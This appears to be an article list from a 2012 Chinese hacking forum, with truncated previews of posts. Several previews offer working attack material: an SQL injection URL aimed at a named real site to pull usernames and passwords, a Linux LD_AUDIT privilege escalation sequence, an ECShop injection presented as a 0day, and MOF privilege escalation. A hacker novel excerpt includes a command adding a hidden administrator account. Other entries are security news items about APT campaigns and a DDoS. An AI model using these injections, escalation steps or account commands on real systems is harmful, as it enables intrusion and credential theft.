文章列表

《暗黑》第一章:蜕变 || 第一节:虚拟世界

第一章 蜕变1. 虚拟世界咦?这是怎么回事....坐在电脑前的方煜正在攻击一个网站, 手指飞快的敲打着有些残缺的键盘, 同时大脑也随着手指的节奏飞速运转"C:\FYhacks.exe net user FYHACK 123 /add&&net localgroup administrators FYHACK /add""Hello Hacker! Good Bye~"正当方煜还在思索自己是不是搞进蜜

2012-12-22 23:42 21 6612

逆向追踪远控作者

国外大牛继续发力,人肉追踪了PlugX RAT的作者.主要利用Microsoft Office的漏洞CVE-2012-0158,当用户打开这些攻击邮件附件时,就会因为CVE-2012-0158漏洞中招并下载三个文件:Nvidia执行文件NvSmart.exe,DLL文件 (NvSmartMax.dll) 和一个二进制文件(boot.ldr).赛门铁克也曾经分析报道过:http://www.syma

2012-12-22 19:11 54 13969

Mysql结合mof权限提升(Windows)

漏洞正是工业级病毒Stuxnet所用的0day之一windows写权限变成可执行权限的利用喜)xsserWindows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。 Method2: 使用 IMofCompiler 接口和 $ CompileFile 方法

2012-12-21 22:38 78 7894

ECShop_V2.7.3_GBK_release1106 注入 0day

C0deplay Team j8g看代码/* 修改个人资料的处理 */elseif ($action == 'act_edit_profile'){ include_once(ROOT_PATH . 'includes/lib_transaction.php'); $birthday = trim($_POST) .'-'. trim($_POST) .'-'. trim($_POST); $email = trim($_POST); $other = $msn = isset($_POST)

2012-12-21 21:42 67 7434

exp,对部分2.6.18*的有用

应该是2010年出的吧,可能有部分同学那时没有注意到,此方法可以提低版本的2.6.18*.2012就不用试了,2011的有时可以成功mkdir /tmp/exploitln /bin/ping /tmp/exploit/targetexec 3< /tmp/exploit/targetrm -rf /tmp/exploit/gcc -w -fPIC -shared -o /tmp/exploit payload.c LD_AUDIT="\$ORIGIN" exec

2012-12-21 18:10 22 6525

最土团购 注入 好久的了

直接来代码,你们就知道了。代码不分析了。,今天好累呀!http://tao.mphone.cc/api/call.php?action=query&num=j8g'%29/**/union/**/select/**/1,2,3,concat(0x7e,0x27,username,0x7e,0x27,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23关键字百度 Powered by ZuiTu

2012-12-21 16:52 20 5216

利用解析漏洞与写文件漏洞getwebshell小记一篇

0x01 目标基本信息搜集,发现敏感文件目标 xxx.com手工测试了下没发现注入,上传之类的,网站也很简单gpc也开着,所有就算有包含漏洞也没什么用了google一下也没发现什么有用的东西,后台地址也没有拿出pker 扫了下,发现有.bash_history文件和 /tmp目录 没发现别的有用的/tmp打开发现居然是服务器

2012-12-21 15:07 25 4983

韩国APT攻击剑指俄罗斯

日前,安全公司FireEye收集了大量的证据,发现了一起典型APT攻击的网络间谍活动,其中使用了恶意软件“Sanny”,FireEye没有透露该间谍活动的详细信息,但经证实,该起间谍活动针对的目标80%都是俄罗斯教育、电信、军工、IT、航空航天等行业。 FireEye公司恶意软件智能实验室研究人员Alex Lanstein和Al

2012-12-21 11:04 4 2509

基地组织官网遭受海量ddos攻击

据外媒报道, 基地组织官网日前遭受海量的DDOS攻击,网站已经离线越2个礼拜了,之前,基地组织在网站上释放了一个“Salil al-Sawarim 3”的短片,该短片是基地组织武装分子与伊拉克士兵的对战宣传视频,该短片在网络公布之后播放次数达到了数万次.基地组织通过网站发布宣传信息,在世界各地招聘圣战小青

2012-12-21 11:02 2 3187

dedecmsv5.7 最新爆绝对路径

先上图吧!具体细节,看代码就知道了!哈哈,世界末日了!!!

2012-12-20 20:54 34 7686